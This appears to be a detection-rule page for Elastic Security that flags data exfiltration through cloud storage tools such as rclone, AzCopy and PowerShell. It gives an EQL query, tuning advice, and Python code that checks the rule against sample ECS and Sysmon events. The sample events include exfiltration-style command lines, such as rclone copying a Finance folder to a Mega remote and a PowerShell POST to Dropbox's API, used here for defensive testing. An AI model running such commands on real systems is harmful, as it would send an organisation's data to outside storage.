THREAT-CloudStorage-DataExfil Elastic Security · Elastic

Detect Data Exfiltration via Cloud Storage Services in Elastic Security

Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, rclone, AzCopy, ShareFile) to blend exfiltration traffic with normal business activity, bypassing egress monitoring that blocks unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP/cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution with external cloud endpoints, large outbound data transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunity exists in the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).

MITRE ATT&CK

Tactic: Exfiltration

Elastic Detection Query

Elastic Security (Elastic), EQL:

process where event.type == "start" and
(
  process.name : "rclone.exe"
  or (
    process.name : "azcopy.exe" and
    process.command_line : ("*blob.core.windows.net*", "*file.core.windows.net*", "*queue.core.windows.net*")
  )
  or (
    process.name : ("curl.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe") and
    process.command_line : (
      "*mega.nz*", "*mega.io*", "*dropbox.com*", "*dropboxapi.com*",
      "*transfer.sh*", "*gofile.io*", "*box.com*", "*box.net*",
      "*drive.google.com*", "*onedrive.live.com*", "*sharefile.com*",
      "*sendspace.com*", "*filebin.net*", "*anonfiles.com*"
    )
  )
)

Severity: high. Confidence: high.

Detects data exfiltration via cloud storage tools using Elastic ECS process events. Alerts on rclone.exe execution (primary ransomware exfil tool used by Scattered Spider, Akira, Black Basta), AzCopy targeting external Azure Blob/File storage endpoints, and PowerShell or curl invocations referencing known cloud storage and anonymous file-sharing domains. Maps to MITRE T1567.002.

Data Sources

  • Elastic Endpoint Security
  • Elastic Agent (Endpoint Integration)
  • Winlogbeat with Sysmon

Required Tables

  • logs-endpoint.events.process-*
  • winlogbeat-*

False Positives & Tuning

  • Authorized IT data migrations: infrastructure teams running rclone for approved cloud storage migrations between providers — verify with change management tickets, whitelist specific service account process.user.name values, and correlate against known maintenance windows
  • Azure DevOps or CI/CD pipelines: AzCopy invoked by pipeline agents deploying static assets to Azure Blob Storage — add corporate Azure storage account FQDNs to the exclusion list in process.command_line and filter on known build agent hostnames via host.name
  • Sanctioned SaaS file sharing: end users on corporate-approved Dropbox Business or Box Enterprise accounts syncing files in bulk — tune alerts to flag only personal or unregistered accounts and supplement with volume thresholds from network events
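To make the query's matching semantics and the tuning above concrete, here is an added example (not Elastic's rule engine or this page's own code) that emulates the EQL logic in Python over constructed ECS-style process events. It reproduces the case-insensitive wildcard behaviour of the EQL `:` operator, then layers on the three exclusions described under False Positives & Tuning: an approved migration service account (process.user.name), corporate Azure storage FQDNs (process.command_line) and build-agent hostnames (host.name). All allowlist values, hostnames and command lines are constructed sample data.

```python
"""Emulate the cloud-storage exfiltration EQL rule over constructed ECS events.

Added example, not Elastic's rule engine.  The EQL ':' operator is a
case-insensitive, wildcard-aware comparison, which is mirrored here with
fnmatch on lower-cased strings.  Allowlists and events are constructed.
"""
import fnmatch

AZCOPY_ENDPOINTS = ["*blob.core.windows.net*", "*file.core.windows.net*",
                    "*queue.core.windows.net*"]
SCRIPT_HOSTS = {"curl.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
CLOUD_DOMAINS = [
    "*mega.nz*", "*mega.io*", "*dropbox.com*", "*dropboxapi.com*",
    "*transfer.sh*", "*gofile.io*", "*box.com*", "*box.net*",
    "*drive.google.com*", "*onedrive.live.com*", "*sharefile.com*",
    "*sendspace.com*", "*filebin.net*", "*anonfiles.com*",
]

# Tuning allowlists (constructed placeholders; populate from change management).
APPROVED_MIGRATION_ACCOUNTS = {"svc-cloudmigrate"}               # process.user.name
CORPORATE_AZURE_FQDNS = ["*corpassets.blob.core.windows.net*"]   # process.command_line
BUILD_AGENT_HOSTS = {"build-agent-01", "build-agent-02"}          # host.name


def _wild(value, patterns):
    """EQL ':' semantics: case-insensitive glob match against any pattern."""
    v = (value or "").lower()
    return any(fnmatch.fnmatchcase(v, p.lower()) for p in patterns)


def rule_matches(ev):
    """True when the untuned query would alert on this ECS process event."""
    if ev.get("event.type") != "start":
        return False
    name = (ev.get("process.name") or "").lower()   # ':' on process.name is case-insensitive
    cmd = ev.get("process.command_line", "")
    if name == "rclone.exe":
        return True
    if name == "azcopy.exe" and _wild(cmd, AZCOPY_ENDPOINTS):
        return True
    if name in SCRIPT_HOSTS and _wild(cmd, CLOUD_DOMAINS):
        return True
    return False


def tuned_exclusion(ev):
    """Return the tuning reason that suppresses a matching event, or None."""
    name = (ev.get("process.name") or "").lower()
    cmd = ev.get("process.command_line", "")
    if name == "rclone.exe" and ev.get("process.user.name") in APPROVED_MIGRATION_ACCOUNTS:
        return "approved migration service account"
    if (name == "azcopy.exe" and _wild(cmd, CORPORATE_AZURE_FQDNS)
            and ev.get("host.name") in BUILD_AGENT_HOSTS):
        return "CI build agent deploying to corporate storage"
    return None


def evaluate(events):
    """Classify each event as 'alert', 'suppressed' or 'no-match'."""
    out = []
    for ev in events:
        if not rule_matches(ev):
            out.append("no-match")
        elif tuned_exclusion(ev):
            out.append("suppressed")
        else:
            out.append("alert")
    return out


# Constructed sample events; comments give the expected classification.
SAMPLE_EVENTS = [
    # interactive user running rclone -> alert
    {"event.type": "start", "process.name": "rclone.exe", "process.user.name": "jdoe",
     "host.name": "ws-0142", "process.command_line": "rclone.exe copy C:\\Finance mega:share -P"},
    # approved migration service account -> suppressed
    {"event.type": "start", "process.name": "rclone.exe", "process.user.name": "svc-cloudmigrate",
     "host.name": "mig-srv-01", "process.command_line": "rclone.exe sync s3:bucket gdrive:archive"},
    # AzCopy to an unknown external blob endpoint; mixed-case name still matches -> alert
    {"event.type": "start", "process.name": "AzCopy.exe", "process.user.name": "jdoe",
     "host.name": "ws-0142", "process.command_line": "azcopy.exe copy D:\\HR https://unknown01.blob.core.windows.net/in"},
    # build agent publishing to corporate storage -> suppressed
    {"event.type": "start", "process.name": "azcopy.exe", "process.user.name": "svc-build",
     "host.name": "build-agent-01", "process.command_line": "azcopy.exe copy ./dist https://corpassets.blob.core.windows.net/web --recursive"},
    # PowerShell referencing a cloud storage domain in upper case -> alert
    {"event.type": "start", "process.name": "powershell.exe", "process.user.name": "jdoe",
     "host.name": "ws-0142", "process.command_line": "powershell.exe -c Invoke-WebRequest -Uri https://api.DROPBOXAPI.com/... -Method POST"},
    # curl to an internal API -> no-match
    {"event.type": "start", "process.name": "curl.exe", "process.user.name": "jdoe",
     "host.name": "ws-0142", "process.command_line": "curl.exe https://intranet.example.local/api/health"},
    # process end event for rclone -> no-match (query requires event.type == "start")
    {"event.type": "end", "process.name": "rclone.exe", "process.user.name": "jdoe",
     "host.name": "ws-0142", "process.command_line": "rclone.exe copy C:\\Finance mega:share -P"},
]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{verdict:10s} {ev['process.name']} ({ev['process.user.name']}@{ev['host.name']})")
```

Note that `*box.com*` also matches `dropbox.com`, exactly as the EQL wildcard does; that overlap is harmless here but worth remembering when you add further domains. The exclusions are deliberately narrow (account plus tool, FQDN plus host) so that a single allowlisted value does not silence the whole rule.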


Testing Methodology

Validate this detection against one adversary technique from Atomic Red Team. The test below lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Simulate Cloud Exfiltration via rclone to Mega

    Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.
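When running the test, it helps to check the two expected signals are not just present but linked, since an unrelated Mega connection from another process would otherwise pass a naive check. The following added example (not part of the page's test package) takes Sysmon events as dicts using Sysmon's own field names (EventID, UtcTime, ProcessGuid, Image, CommandLine, DestinationHostname) and confirms that an rclone.exe copy was followed, within a time window, by a network connection from the same ProcessGuid to a mega.co.nz host. The event records, timestamps and GUIDs are constructed.

```python
"""Validate that an rclone-to-Mega test produced linked Sysmon EID 1 and EID 3 signals.

Added example, not part of the page's test package.  Events are dicts
keyed by Sysmon field names; all records below are constructed.
"""
from datetime import datetime

# Hosts the expected signal names, plus the apex domain seen in the detection query.
MEGA_HOSTS = ("mega.co.nz", "api.mega.co.nz", "mega.nz")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def rclone_copy_starts(events):
    """Sysmon EID 1 records for rclone.exe invoked with the copy command."""
    return [e for e in events
            if e["EventID"] == 1
            and e["Image"].lower().endswith("\\rclone.exe")
            and " copy " in f" {e['CommandLine'].lower()} "]


def validate_test(events, window_seconds=120):
    """Return (ok, detail). ok is True only when an rclone copy (EID 1) is followed
    by a network connection (EID 3) from the same ProcessGuid to a Mega host."""
    starts = rclone_copy_starts(events)
    if not starts:
        return False, "no Sysmon EID 1 for an rclone.exe copy"
    conns = [e for e in events if e["EventID"] == 3]
    for s in starts:
        for c in conns:
            # Sysmon may leave DestinationHostname blank; in that case you would
            # need to join against DNS query events (EID 22) or resolve the IP.
            host = (c.get("DestinationHostname") or "").lower()
            delta = (_ts(c["UtcTime"]) - _ts(s["UtcTime"])).total_seconds()
            if (c["ProcessGuid"] == s["ProcessGuid"] and 0 <= delta <= window_seconds
                    and host.endswith(MEGA_HOSTS)):
                return True, f"EID 1 {s['ProcessGuid']} linked to EID 3 -> {host}"
    return False, "EID 1 present but no EID 3 to a Mega host from the same ProcessGuid in window"


# Constructed Sysmon records: the linked pair is GUID {A1}; {B2} is a decoy browser connection.
SAMPLE_SYSMON = [
    {"EventID": 1, "UtcTime": "2025-01-15 10:00:00", "ProcessGuid": "{A1}",
     "Image": "C:\\Tools\\rclone.exe", "CommandLine": "rclone.exe copy C:\\Finance mega:share -P"},
    {"EventID": 3, "UtcTime": "2025-01-15 10:00:04", "ProcessGuid": "{B2}",
     "Image": "C:\\Program Files\\Browser\\browser.exe", "DestinationHostname": "mega.nz"},
    {"EventID": 3, "UtcTime": "2025-01-15 10:00:07", "ProcessGuid": "{A1}",
     "Image": "C:\\Tools\\rclone.exe", "DestinationHostname": "api.mega.co.nz"},
    {"EventID": 1, "UtcTime": "2025-01-15 10:05:00", "ProcessGuid": "{C3}",
     "Image": "C:\\Tools\\rclone.exe", "CommandLine": "rclone.exe lsd s3:backups"},
]

if __name__ == "__main__":
    print(validate_test(SAMPLE_SYSMON))
```

The ProcessGuid join is the important part: Sysmon's EID 3 carries the GUID of the process that opened the socket, so it ties the transfer phase back to the specific rclone.exe start rather than to any Mega traffic on the host. If only the decoy browser connection were present the check fails, which is the outcome you want when validating the rule.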
